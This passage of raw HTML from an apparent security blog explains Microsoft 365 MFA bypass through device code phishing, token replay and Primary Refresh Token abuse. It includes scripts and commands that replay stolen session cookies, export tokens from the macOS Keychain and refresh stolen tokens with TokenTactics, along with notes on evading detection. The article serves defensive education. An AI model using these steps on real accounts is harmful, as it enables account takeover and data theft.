16%)\"><span class=\"token plain\"></span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">curl</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-H</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Authorization: Bearer &lt;access_token&gt;\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/v1.0/me/memberOf\"</span><br></span></code></pre></div></div>\n<p>Within the first 15 minutes of the access token lifetime, a threat actor can extract the full mailbox content of a C-suite executive, identify all privileged groups and their members, exfiltrate all OneDrive and SharePoint files accessible to that user, and read all Teams conversation history  including channels with sensitive strategic discussions.</p>\n<p>The refresh token extends this for 90 days:</p>\n<div class=\"language-python codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-python codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Refresh token exchange  get new access token when old one expires</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">r </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> requests</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">post</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://login.microsoftonline.com/common/oauth2/v2.0/token\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    data</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"grant_type\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"refresh_token\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"client_id\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"d3590ed6-52b3-4102-aeff-aad2292ab01c\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"refresh_token\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"&lt;90-day token&gt;\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"scope\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/.default offline_access\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Returns a new access_token + new refresh_token (sliding window)</span><br></span></code></pre></div></div>\n<p>The refresh token slides  each use extends the window. As long as the attacker uses it at least every 90 days, access is persistent until an administrator explicitly revokes all user refresh tokens.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"14-dynamic-code-generation-bypassing-the-15-minute-expiry\">1.4 Dynamic Code Generation: Bypassing the 15-Minute Expiry<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#14-dynamic-code-generation-bypassing-the-15-minute-expiry\" class=\"hash-link\" aria-label=\"Direct link to 1.4 Dynamic Code Generation: Bypassing the 15-Minute Expiry\" title=\"Direct link to 1.4 Dynamic Code Generation: Bypassing the 15-Minute Expiry\" translate=\"no\">​</a></h3>\n<p>Early device code phishing campaigns had a critical weakness: the code expired 15 minutes after generation. Attackers who pre-generated codes and embedded them in bulk phishing emails lost the race if the victim opened the email more than 15 minutes after sending.</p>\n<p>The <strong>SquarePhish2</strong> toolkit and the <strong>EvilTokens PhaaS platform</strong> (documented in early 2026) solve this with dynamic generation:</p>\n<!-- -->\n<p>The victim has a 15-minute window from the moment they click  which is far more than enough time to complete authentication. The attacker's timing problem is completely eliminated.</p>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-2--token-replay-stealing-what-was-already-legitimately-issued\">Part 2  Token Replay: Stealing What Was Already Legitimately Issued<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#part-2--token-replay-stealing-what-was-already-legitimately-issued\" class=\"hash-link\" aria-label=\"Direct link to Part 2  Token Replay: Stealing What Was Already Legitimately Issued\" title=\"Direct link to Part 2  Token Replay: Stealing What Was Already Legitimately Issued\" translate=\"no\">​</a></h2>\n<p>Device code phishing manipulates the issuance process. Token replay skips it entirely  the attacker steals a token that was issued legitimately during a real user session.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"21-where-tokens-live-and-how-theyre-stolen\">2.1 Where Tokens Live and How They're Stolen<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#21-where-tokens-live-and-how-theyre-stolen\" class=\"hash-link\" aria-label=\"Direct link to 2.1 Where Tokens Live and How They're Stolen\" title=\"Direct link to 2.1 Where Tokens Live and How They're Stolen\" translate=\"no\">​</a></h3>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"browser-session-cookies-pass-the-cookie\">Browser Session Cookies (Pass-the-Cookie)<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#browser-session-cookies-pass-the-cookie\" class=\"hash-link\" aria-label=\"Direct link to Browser Session Cookies (Pass-the-Cookie)\" title=\"Direct link to Browser Session Cookies (Pass-the-Cookie)\" translate=\"no\">​</a></h4>\n<p>When a user authenticates to Microsoft 365, Entra ID issues session cookies. The most valuable: <strong>ESTSAUTH</strong> and <strong>ESTSAUTHPERSISTENT</strong>  the session cookies that represent a completed, MFA-satisfied authentication.</p>\n<div class=\"language-bash codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-bash codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Chrome/Edge store cookies in a SQLite database</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Windows path:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">%LOCALAPPDATA%</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\">Google</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\">Chrome</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\">User Data</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\">Default</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\">Network</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\">Cookies</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">%LOCALAPPDATA%</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\">Microsoft</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\">Edge</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\">User Data</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\">Default</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\">Network</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\">Cookies</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># macOS path:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">~/Library/Application Support/Google/Chrome/Default/Cookies</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">~/Library/Application Support/Microsoft Edge/Default/Cookies</span><br></span></code></pre></div></div>\n<p>The ESTSAUTH cookie, once extracted, can be replayed in a browser on any machine:</p>\n<div class=\"language-python codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-python codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Using requests to replay the stolen session cookie</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> requests</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">session </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> requests</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">Session</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">session</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">cookies</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">set</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ESTSAUTH'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'&lt;stolen_cookie_value&gt;'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    domain</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'login.microsoftonline.com'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">session</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">cookies</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">set</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ESTSAUTHPERSISTENT'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'&lt;stolen_persistent_cookie&gt;'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    domain</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'login.microsoftonline.com'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Access Microsoft 365 with the victim's authenticated session</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">r </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> session</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://outlook.office.com/mail/\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Returns the victim's inbox  no credential prompt, no MFA prompt</span><br></span></code></pre></div></div>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"macos-keychain-token-extraction-documented-in-2025\">macOS Keychain Token Extraction (Documented in 2025)<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#macos-keychain-token-extraction-documented-in-2025\" class=\"hash-link\" aria-label=\"Direct link to macOS Keychain Token Extraction (Documented in 2025)\" title=\"Direct link to macOS Keychain Token Extraction (Documented in 2025)\" translate=\"no\">​</a></h4>\n<p>Microsoft Edge on macOS caches OAuth tokens  including refresh tokens and in some cases Primary Refresh Tokens  in the macOS Keychain. This was documented by security researchers in late 2025:</p>\n<div class=\"language-bash codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-bash codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># List all Microsoft-related Keychain entries</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">security find-internet-password </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-l</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Microsoft Edge\"</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-g</span><span class=\"token plain\"> </span><span class=\"token operator file-descriptor important\" style=\"color:hsl(356, 75%, 47%);font-weight:bold\">2</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&gt;</span><span class=\"token file-descriptor important\" style=\"font-weight:bold;color:hsl(356, 75%, 47%)\">&amp;1</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">grep</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-i</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"microsoft\\|azure\\|msal\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Specific entries to look for:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># \"refreshtoken-1--&lt;guid&gt;\"          OAuth refresh token</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># \"primaryrefreshtoken-1--&lt;guid&gt;\"   Primary Refresh Token (most valuable)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># \"accesstoken-1--&lt;guid&gt;\"           Short-lived access token</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Export a specific entry:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">security find-generic-password </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-a</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"refreshtoken\"</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-s</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Microsoft Edge\"</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-w</span><br></span></code></pre></div></div>\n<p>With the extracted refresh token, the attacker replays it using TokenTactics or a custom script:</p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># TokenTactics  PowerShell module for token manipulation</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Import-Module TokenTactics</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Refresh a stolen token for new access token</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$tokens = RefreshTo-MSGraphToken -refreshToken \"&lt;stolen_refresh_token&gt;\" `</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          -tenantId \"&lt;tenant_id&gt;\" `</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          -clientId \"d3590ed6-52b3-4102-aeff-aad2292ab01c\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$tokens.access_token   # New access token  immediate Graph API access</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$tokens.refresh_token  # New refresh token  sliding 90-day window</span><br></span></code></pre></div></div>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"aitm-adversary-in-the-middle-proxy--evilginx--tycoon-2fa\">AiTM (Adversary-in-the-Middle) Proxy  Evilginx / Tycoon 2FA<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#aitm-adversary-in-the-middle-proxy--evilginx--tycoon-2fa\" class=\"hash-link\" aria-label=\"Direct link to AiTM (Adversary-in-the-Middle) Proxy  Evilginx / Tycoon 2FA\" title=\"Direct link to AiTM (Adversary-in-the-Middle) Proxy  Evilginx / Tycoon 2FA\" translate=\"no\">​</a></h4>\n<p>The most scalable token theft mechanism is the AiTM reverse proxy  documented extensively in Tycoon 2FA campaigns (which comprised 65% of PhaaS-driven credential attacks in H1 2025 per Ontinue):</p>\n<!-- -->\n<p>The proxy sits transparently between user and Microsoft. The user completes real MFA. Microsoft issues real session cookies. The proxy captures them before forwarding to the user's browser. Both parties see a successful authentication. The attacker has the cookies.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"22-the-impossible-travel-detection-gap\">2.2 The Impossible Travel Detection Gap<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#22-the-impossible-travel-detection-gap\" class=\"hash-link\" aria-label=\"Direct link to 2.2 The Impossible Travel Detection Gap\" title=\"Direct link to 2.2 The Impossible Travel Detection Gap\" translate=\"no\">​</a></h3>\n<p>Once the attacker replays the token from their own IP, a geographic anomaly exists. However, token replay has a structural advantage over password-based attacks in evading impossible travel detection:</p>\n<ol>\n<li class=\"\">\n<p><strong>Non-interactive sign-ins don't always trigger impossible travel</strong>. When an attacker uses a refresh token to silently obtain new access tokens, these appear as <strong>non-interactive sign-ins</strong> in Entra ID logs  not evaluated against the same risk policies as interactive sign-ins by default in many tenant configurations.</p>\n</li>\n<li class=\"\">\n<p><strong>The timing gap allows geographic plausibility</strong>. If the attacker waits several hours after token theft before using it from a distant location, the time delta makes the impossible travel calculation ambiguous.</p>\n</li>\n<li class=\"\">\n<p><strong>Commercial VPN and residential proxy services trivially bypass IP geolocation</strong>. Attackers use residential proxies in the victim's city or country to make the access appear local.</p>\n</li>\n</ol>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-3--primary-refresh-token-abuse-the-crown-jewel\">Part 3  Primary Refresh Token Abuse: The Crown Jewel<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#part-3--primary-refresh-token-abuse-the-crown-jewel\" class=\"hash-link\" aria-label=\"Direct link to Part 3  Primary Refresh Token Abuse: The Crown Jewel\" title=\"Direct link to Part 3  Primary Refresh Token Abuse: The Crown Jewel\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"31-what-a-prt-is-and-why-its-uniquely-dangerous\">3.1 What a PRT Is and Why It's Uniquely Dangerous<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#31-what-a-prt-is-and-why-its-uniquely-dangerous\" class=\"hash-link\" aria-label=\"Direct link to 3.1 What a PRT Is and Why It's Uniquely Dangerous\" title=\"Direct link to 3.1 What a PRT Is and Why It's Uniquely Dangerous\" translate=\"no\">​</a></h3>\n<p>The Primary Refresh Token is a special OAuth artifact issued by Entra ID to <strong>Azure AD joined or registered devices</strong>. It is the single most powerful token in the Microsoft identity stack:</p>\n<table><thead><tr><th>Token Type</th><th>Scope</th><th>Lifetime</th><th>MFA Claim</th><th>Device Bound</th></tr></thead><tbody><tr><td>Access Token</td><td>Specific resource</td><td>60–90 min</td><td>Claims inherited</td><td>No</td></tr><tr><td>Refresh Token</td><td>Tenant-wide</td><td>90 days</td><td>Claims inherited</td><td>No</td></tr><tr><td><strong>Primary Refresh Token</strong></td><td><strong>Any Entra ID resource</strong></td><td><strong>14 days (rolling)</strong></td><td><strong>Can satisfy MFA claim</strong></td><td><strong>Yes (TPM-protected on W11)</strong></td></tr></tbody></table>\n<p>A PRT includes a <code>device_id</code> claim and the MFA authentication method claim (<code>amr</code>). When a Conditional Access policy requires \"MFA required\" AND \"compliant device,\" the PRT can satisfy <strong>both conditions simultaneously</strong>. This is why PRT theft is the top-tier attack: stolen PRT → can bypass device compliance checks AND MFA requirements that a stolen access token or refresh token cannot bypass.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"32-prt-extraction-windows\">3.2 PRT Extraction (Windows)<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#32-prt-extraction-windows\" class=\"hash-link\" aria-label=\"Direct link to 3.2 PRT Extraction (Windows)\" title=\"Direct link to 3.2 PRT Extraction (Windows)\" translate=\"no\">​</a></h3>\n<p>On Windows 10 and 11 without TPM, the PRT is stored in LSASS memory and the Windows Credential Manager:</p>\n<div class=\"language-cmd codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-cmd codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Check if the current device has a PRT:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">dsregcmd /status</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Output indicates PRT presence:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># AzureAdPrt : YES</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># AzureAdPrtUpdateTime : 2025-01-15 09:23:44.000 UTC</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 